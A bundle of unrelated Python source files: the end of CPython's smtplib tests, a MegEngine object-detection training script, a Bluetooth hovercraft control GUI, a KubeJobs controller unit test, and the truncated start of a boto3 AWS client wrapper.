hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
train.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import bisect
import copy
import multiprocessing as mp
import os
import time
import megengine as mge
import megengine.distributed as dist
from megengine.autodiff import GradManager
from megengine.data import DataLoader, Infinite, RandomSampler
from megengine.data import transform as T
from megengine.optimizer import SGD
from official.vision.detection.tools.data_mapper import data_mapper
from official.vision.detection.tools.utils import (
AverageMeter,
DetectionPadCollator,
GroupedRandomSampler,
get_config_info,
import_from_file
)
logger = mge.get_logger(__name__)
logger.setLevel("INFO")
def make_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f", "--file", default="net.py", type=str, help="net description file"
)
parser.add_argument(
"-w", "--weight_file", default=None, type=str, help="weights file",
)
parser.add_argument(
"-n", "--ngpus", default=1, type=int, help="total number of gpus for training",
)
parser.add_argument(
"-b", "--batch_size", default=2, type=int, help="batch size for training",
)
parser.add_argument(
"-d", "--dataset_dir", default="/data/datasets", type=str,
)
return parser
def main():
parser = make_parser()
args = parser.parse_args()
# ------------------------ begin training -------------------------- #
logger.info("Device Count = %d", args.ngpus)
log_dir = "log-of-{}".format(os.path.basename(args.file).split(".")[0])
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
if args.ngpus > 1:
master_ip = "localhost"
port = dist.get_free_ports(1)[0]
dist.Server(port)
processes = list()
for rank in range(args.ngpus):
process = mp.Process(
target=worker, args=(master_ip, port, args.ngpus, rank, args)
)
process.start()
processes.append(process)
for p in processes:
p.join()
else:
worker(None, None, 1, 0, args)
def worker(master_ip, port, world_size, rank, args):
if world_size > 1:
dist.init_process_group(
master_ip=master_ip,
port=port,
world_size=world_size,
rank=rank,
device=rank,
)
logger.info("Init process group for gpu{} done".format(rank))
current_network = import_from_file(args.file)
model = current_network.Net(current_network.Cfg())
model.train()
if dist.get_rank() == 0:
logger.info(get_config_info(model.cfg))
logger.info(repr(model))
params_with_grad = []
for name, param in model.named_parameters():
if "bottom_up.conv1" in name and model.cfg.backbone_freeze_at >= 1:
continue
if "bottom_up.layer1" in name and model.cfg.backbone_freeze_at >= 2:
continue
params_with_grad.append(param)
opt = SGD(
params_with_grad,
lr=model.cfg.basic_lr * args.batch_size,
momentum=model.cfg.momentum,
weight_decay=model.cfg.weight_decay * dist.get_world_size(),
)
gm = GradManager()
if dist.get_world_size() > 1:
gm.attach(
params_with_grad,
callbacks=[dist.make_allreduce_cb("SUM", dist.WORLD)]
)
else:
gm.attach(params_with_grad)
if args.weight_file is not None:
weights = mge.load(args.weight_file)
model.backbone.bottom_up.load_state_dict(weights, strict=False)
if dist.get_world_size() > 1:
dist.bcast_list_(model.parameters(), dist.WORLD) # sync parameters
if dist.get_rank() == 0:
logger.info("Prepare dataset")
train_loader = iter(build_dataloader(args.batch_size, args.dataset_dir, model.cfg))
for epoch in range(model.cfg.max_epoch):
train_one_epoch(model, train_loader, opt, gm, epoch, args)
if dist.get_rank() == 0:
save_path = "log-of-{}/epoch_{}.pkl".format(
os.path.basename(args.file).split(".")[0], epoch
)
mge.save(
{"epoch": epoch, "state_dict": model.state_dict()}, save_path,
)
logger.info("dump weights to %s", save_path)
def train_one_epoch(model, data_queue, opt, gm, epoch, args):
def train_func(image, im_info, gt_boxes):
with gm:
loss_dict = model(image=image, im_info=im_info, gt_boxes=gt_boxes)
gm.backward(loss_dict["total_loss"])
loss_list = list(loss_dict.values())
opt.step().clear_grad()
return loss_list
meter = AverageMeter(record_len=model.cfg.num_losses)
time_meter = AverageMeter(record_len=2)
log_interval = model.cfg.log_interval
tot_step = model.cfg.nr_images_epoch // (args.batch_size * dist.get_world_size())
for step in range(tot_step):
adjust_learning_rate(opt, epoch, step, model.cfg, args)
data_tik = time.time()
mini_batch = next(data_queue)
data_tok = time.time()
tik = time.time()
loss_list = train_func(
image=mge.tensor(mini_batch["data"]),
im_info=mge.tensor(mini_batch["im_info"]),
gt_boxes=mge.tensor(mini_batch["gt_boxes"])
)
tok = time.time()
time_meter.update([tok - tik, data_tok - data_tik])
if dist.get_rank() == 0:
info_str = "e%d, %d/%d, lr:%f, "
loss_str = ", ".join(
["{}:%f".format(loss) for loss in model.cfg.losses_keys]
)
time_str = ", train_time:%.3fs, data_time:%.3fs"
log_info_str = info_str + loss_str + time_str
meter.update([loss.numpy() for loss in loss_list])
if step % log_interval == 0:
logger.info(
log_info_str,
epoch,
step,
tot_step,
opt.param_groups[0]["lr"],
*meter.average(),
*time_meter.average()
)
meter.reset()
time_meter.reset()
def adjust_learning_rate(optimizer, epoch, step, cfg, args):
base_lr = (
cfg.basic_lr * args.batch_size * (
cfg.lr_decay_rate
** bisect.bisect_right(cfg.lr_decay_stages, epoch)
)
)
# Warm up
lr_factor = 1.0
if epoch == 0 and step < cfg.warm_iters:
lr_factor = (step + 1.0) / cfg.warm_iters
for param_group in optimizer.param_groups:
param_group["lr"] = base_lr * lr_factor
def build_dataset(dataset_dir, cfg):
data_cfg = copy.deepcopy(cfg.train_dataset)
data_name = data_cfg.pop("name")
data_cfg["root"] = os.path.join(dataset_dir, data_name, data_cfg["root"])
if "ann_file" in data_cfg:
data_cfg["ann_file"] = os.path.join(dataset_dir, data_name, data_cfg["ann_file"])
data_cfg["order"] = ["image", "boxes", "boxes_category", "info"]
return data_mapper[data_name](**data_cfg)
# pylint: disable=dangerous-default-value
def build_sampler(train_dataset, batch_size, aspect_grouping=[1]):
def _compute_aspect_ratios(dataset):
aspect_ratios = []
for i in range(len(dataset)):
info = dataset.get_img_info(i)
aspect_ratios.append(info["height"] / info["width"])
return aspect_ratios
def _quantize(x, bins):
return list(map(lambda y: bisect.bisect_right(sorted(bins), y), x))
if len(aspect_grouping) == 0:
return Infinite(RandomSampler(train_dataset, batch_size, drop_last=True))
aspect_ratios = _compute_aspect_ratios(train_dataset)
group_ids = _quantize(aspect_ratios, aspect_grouping)
return Infinite(GroupedRandomSampler(train_dataset, batch_size, group_ids))
def build_dataloader(batch_size, dataset_dir, cfg):
train_dataset = build_dataset(dataset_dir, cfg)
train_sampler = build_sampler(train_dataset, batch_size)
train_dataloader = DataLoader(
train_dataset,
sampler=train_sampler,
transform=T.Compose(
transforms=[
T.ShortestEdgeResize(
cfg.train_image_short_size,
cfg.train_image_max_size,
sample_style="choice",
),
T.RandomHorizontalFlip(),
T.ToMode(),
],
order=["image", "boxes", "boxes_category"],
),
collator=DetectionPadCollator(),
num_workers=2,
)
return train_dataloader
if __name__ == "__main__":
main()
|
hovercraft_controler.py
|
# -*- coding: utf-8 -*-
import Tkinter
import bluetooth
#import tkMessageBox
import threading
import time
import sys
# ZMIENNE GLOBALNE
KOD_STERUJACY = "6000012011" # 60 000 120 1 1
# serwo silnik_tyl silnik_dol kierunek_tyl kierunek_dol
WallWarning = "0"
ZAMEK = threading.Lock()
SwitchOff = True
# -------------------------------------------------
class NiebieskiZab():
def __init__(self):
self.ADRES_PODUSZKOWCA = "20:15:12:14:51:53"
self.PORT = 1
self.socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM) # ZAKOMENTOWAC DO TESTOW
self.socket.connect((self.ADRES_PODUSZKOWCA, self.PORT)) # ZAKOMENTOWAC DO TESTOW
def komunikacja(self):
global KOD_STERUJACY
global ZAMEK
global WallWarning
global SwitchOff
while SwitchOff:
ZAMEK.acquire()
message_tmp = KOD_STERUJACY
ZAMEK.release()
message = self.string2chars2string(KOD_STERUJACY)
self.socket.send(message)
response_tmp = self.socket.recv(1024)
response = ord(response_tmp) # konwersja znaku char na wartosc liczbowa ASCII
WallWarning = str(response)
time.sleep(0.5)
self.socket.send(self.string2chars2string("6000000011")+"~") # po rozlaczeniu wylacza silnik tylny
self.socket.close()
def string2chars2string(self, str_kod):
# zwraca stringa przekonwertowanego na znaki kodu ASCII
# tylda jest charakterystycznych znakiem konca kodu sterujacego
result = ( str(chr(int(str_kod[0:2]))) + str(chr(int(str_kod[2:5]))) + str(chr(int(str_kod[5:8]))) +
str(chr(int(str_kod[8]))) + str(chr(int(str_kod[9]))) + "~")
return result
def __del__(self):
self.socket.close() # ZAKOMENTOWAC DO TESTOW
pass
class Gui():
def __init__(self):
# ZMIENNE
self.UpDownStep = 5
self.LeftRightStep = 1
self.MinUpDown = 0
self.MaxUpDown = 120
self.MinLeftRight = 40
self.MaxLeftRight = 80
# --------------------------------------------------------------------------------------------
self.top = Tkinter.Tk()
self.top.title("STM Hovercraft")
self.tekst_help = Tkinter.Label(self.top, text="Aplikacja do testowania poduszkowca")
self.power_on = Tkinter.Button(self.top, bg="green", text="ON", command=self.uruchom)
self.power_off = Tkinter.Button(self.top, bg="red", text="OFF", command=self.zamknij)
self.w_gore = Tkinter.Button(self.top, bg="blue",text="+", command=lambda: self.sterowanie("Up"))
self.w_dol = Tkinter.Button(self.top, bg="blue",text="-", command=lambda: self.sterowanie("Down"))
self.w_prawo = Tkinter.Button(self.top, bg="blue",text="->", command=lambda: self.sterowanie("Right"))
self.w_lewo = Tkinter.Button(self.top, bg="blue",text="<-", command=lambda: self.sterowanie("Left"))
self.label_skret = Tkinter.Label(self.top, text="lab1",relief=Tkinter.RIDGE)
self.label_wiatrak = Tkinter.Label(self.top,text="lab2",relief=Tkinter.RIDGE)
self.label_przeszkoda = Tkinter.Label(self.top, text="centymetry", relief=Tkinter.RIDGE)
self.tekst_help.grid(column=1,row=1,columnspan=5,ipadx=50,ipady=10, sticky="N")
self.label_skret.grid(column=2,row=4,columnspan=2, ipadx=70,ipady=10)
self.label_wiatrak.grid(column=2,row=3,columnspan=2, ipadx=70,ipady=10)
self.power_on.grid(column=2,row=2,ipadx=30,ipady=10)
self.power_off.grid(column=3,row=2,ipadx=30,ipady=10)
self.w_gore.grid(column=0,row=2,columnspan=2,ipadx=10,ipady=30)
self.w_dol.grid(column=0,row=4,columnspan=2,ipadx=10,ipady=30)
self.w_prawo.grid(column=1,row=3,ipadx=30,ipady=10)
self.w_lewo.grid(column=0,row=3,ipadx=30,ipady=10)
self.label_przeszkoda.grid(column=2,row=5,columnspan=2, ipadx=60,ipady=10)
self.top.bind("<Up>", self.sterowanie) # nacisniety klawisz jest podawany niejawnie jako argument metody sterowanie
self.top.bind("<Down>", self.sterowanie)
self.top.bind("<Right>", self.sterowanie)
self.top.bind("<Left>", self.sterowanie)
self.update_silnik()
self.update_serwo()
self.top.protocol("WM_DELETE_WINDOW", self.quit_close)
self.refresh() # odswieza wartosci gdy nic nie jest przesylane przez Bluetooth
self.top.mainloop()
def quit_close(self):
global SwitchOff
SwitchOff = False
sys.exit(0)
def uruchom(self):
global SwitchOff
SwitchOff = True
self.blutacz = NiebieskiZab()
self.watek_blutacza = threading.Thread(target=self.blutacz.komunikacja)
self.watek_blutacza.start()
def zamknij(self):
print "OFF"
global SwitchOff
SwitchOff = False
def refresh(self):
self.update_silnik()
self.update_serwo()
self.update_WallWarning()
self.top.after(100,self.refresh)
def update_serwo(self):
global KOD_STERUJACY
self.label_skret.config(text="Skręt: " + KOD_STERUJACY[0:2])
def update_silnik(self):
global KOD_STERUJACY
self.label_wiatrak.config(text="Moc: " + KOD_STERUJACY[2:5])
def update_WallWarning(self):
global WallWarning
self.label_przeszkoda.config(text="Do przeszkody: " + WallWarning + " cm")
def sterowanie(self,przycisk):
global KOD_STERUJACY
if isinstance(przycisk,str):
klawisz = przycisk
else:
klawisz = str(przycisk.keysym)
if klawisz=="Up":
if ( int(KOD_STERUJACY[2:5])+self.UpDownStep <= self.MaxUpDown ):
new_value = int(KOD_STERUJACY[2:5]) + self.UpDownStep
uzupelnij = 3 - len(str(new_value)) # uzupelnienie zerami zmiennej KOD_STERUJACY
KOD_STERUJACY = KOD_STERUJACY[:2] + uzupelnij * "0" + str(new_value) + KOD_STERUJACY[5:]
elif klawisz=="Down":
if ( int(KOD_STERUJACY[2:5])-self.UpDownStep >= self.MinUpDown ):
new_value = int(KOD_STERUJACY[2:5]) - self.UpDownStep
uzupelnij = 3 - len(str(new_value))
KOD_STERUJACY = KOD_STERUJACY[:2] + uzupelnij * "0" + str(new_value) + KOD_STERUJACY[5:]
elif klawisz=="Right":
if ( int(KOD_STERUJACY[0:2])+self.LeftRightStep <= self.MaxLeftRight ):
new_value = int(KOD_STERUJACY[0:2]) + self.LeftRightStep
KOD_STERUJACY = str(new_value) + KOD_STERUJACY[2:]
elif klawisz=="Left":
if ( int(KOD_STERUJACY[0:2])-self.LeftRightStep >= self.MinLeftRight ):
new_value = int(KOD_STERUJACY[0:2]) - self.LeftRightStep
KOD_STERUJACY = str(new_value) + KOD_STERUJACY[2:]
self.update_silnik()
self.update_serwo()
# MAIN
if __name__ == '__main__':
top = Gui()
|
test_plugin.py
|
# Copyright (c) 2017 UFCG-LSD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import threading
import unittest
from controller.exceptions import api as ex
from controller.plugins.controller.kubejobs.alarm import KubeJobs
from controller.plugins.controller.kubejobs.plugin import KubejobsController
from controller.test.unit.mocks.actuator_mock import ActuatorMock
from controller.test.unit.mocks.metric_source_mock import MetricSourceMock
"""
Class that tests the KubeJobsController components.
"""
class TestKubeJobsController(unittest.TestCase):
"""
Set up KubeJobsController object.
"""
def setUp(self):
application_id = "000001"
self.parameters = {
"control_parameters": {
"metric_source": "redis",
"schedule_strategy": "default",
"actuator": 'nop',
"trigger_down": 1,
"trigger_up": 1,
"min_rep": 2,
"max_rep": 10,
"check_interval": 1,
"actuation_size": 3},
"redis_ip": "192.168.0.0",
"redis_port": "5000",
"application_id": application_id
}
self.kubejobs1 = KubeJobs(self.parameters)
self.kubejobs1.metric_source = \
MetricSourceMock("2018-11-26T15:00:00.000Z", -2)
self.kubejobs1.actuator = ActuatorMock()
self.controller = KubejobsController(application_id, self.parameters)
self.controller.alarm = self.kubejobs1
"""
"""
def tearDown(self):
pass
"""
Test that stop application works.
"""
def test_start_stop_application(self):
thread1 = threading.Thread(
target=self.controller.start_application_scaling)
thread1.start()
self.assertTrue(self.controller.running)
while thread1.is_alive():
if self.controller.running:
self.controller.stop_application_scaling()
self.assertFalse(self.controller.running)
"""
Test that the status returned is correct.
"""
def test_status(self):
self.assertEqual("", self.controller.status())
thread1 = threading.Thread(
target=self.controller.start_application_scaling)
thread1.start()
self.assertTrue(self.controller.running)
while thread1.is_alive():
if self.controller.running:
self.controller.stop_application_scaling()
self.assertEqual("Progress error-[2018-11-26 15:00:00]--2.000000",
self.controller.status())
def test_wrong_request_body(self):
"""
Asserts that a BadRequestException will occur if
one of the parameters is missing
Args: None
Returns: None
"""
application_id = "000002"
request_error_counter = len(self.parameters["control_parameters"])
for key in self.parameters["control_parameters"]:
parameters_test = copy.deepcopy(self.parameters)
del parameters_test["control_parameters"][key]
try:
KubejobsController(application_id, parameters_test)
except ex.BadRequestException:
request_error_counter -= 1
self.assertEqual(request_error_counter, 1)
|
aws.py
|
import boto3
from .common import Common
from botocore import config as botoconf
from botocore import exceptions
from multiprocessing import Process, Pipe
class AWSSubprocessWrapper:
def __init__(self, client):
self.client = client
def __getattr__(self, attr):
if hasattr(self.client, attr):
a = getattr(self.client, attr)
if callable(a):
return AWSSubprocessWrapper.SubprocessCallWrapper(a)
return a
raise AttributeError
class SubprocessCallWrapper:
def __init__(self, target):
self.target = target
def __call__(self, *args, **kwargs):
own, remote = Pipe(False)
p = Process(target=self.execute, args=[remote, *args], kwargs=kwargs, daemon=True)
p.start()
p.join()
data = own.recv()
if isinstance(data, Exception):
raise data
return data
def execute(self, remote, *args, **kwargs):
try:
data = self.target(*args, **kwargs)
except Exception as e:
remote.send(e)
remote.send(data)
class AWS:
def __init__(self):
Common.Session.context_update_hooks.append(self.idcaller)
self.idcaller()
def conf(self):
return botoconf.Config(
region_name = Common.Session.region,
signature_version = 'v4',
)
def s3conf(self):
return botoconf.Config(
region_name = Common.Session.region,
signature_version = 's3v4',
)
def env_session(self):
return boto3.Session()
def __call__(self, service, keys=None):
if service == 's3':
config = self.s3conf()
else:
config = self.conf()
client = boto3.client(
service,
aws_access_key_id=keys['access'] if keys is not None else Common.Configuration.keystore[Common.Session.context]['access'],
aws_secret_access_key=keys['secret'] if keys is not None else Common.Configuration.keystore[Common.Session.context]['secret'],
config=config,
)
#return AWSSubprocessWrapper(client)
return client
def whoami(self, keys=None):
return self('sts', keys).get_caller_identity()
def list_regions(self):
return [region['RegionName'] for region in self('ec2').describe_regions(AllRegions=True)['Regions']]
def idcaller(self):
try:
w = self.whoami()
try:
del(Common.Session.info_display.special_colors['Account'])
del(Common.Session.info_display.special_colors['UserId'])
except KeyError:
pass
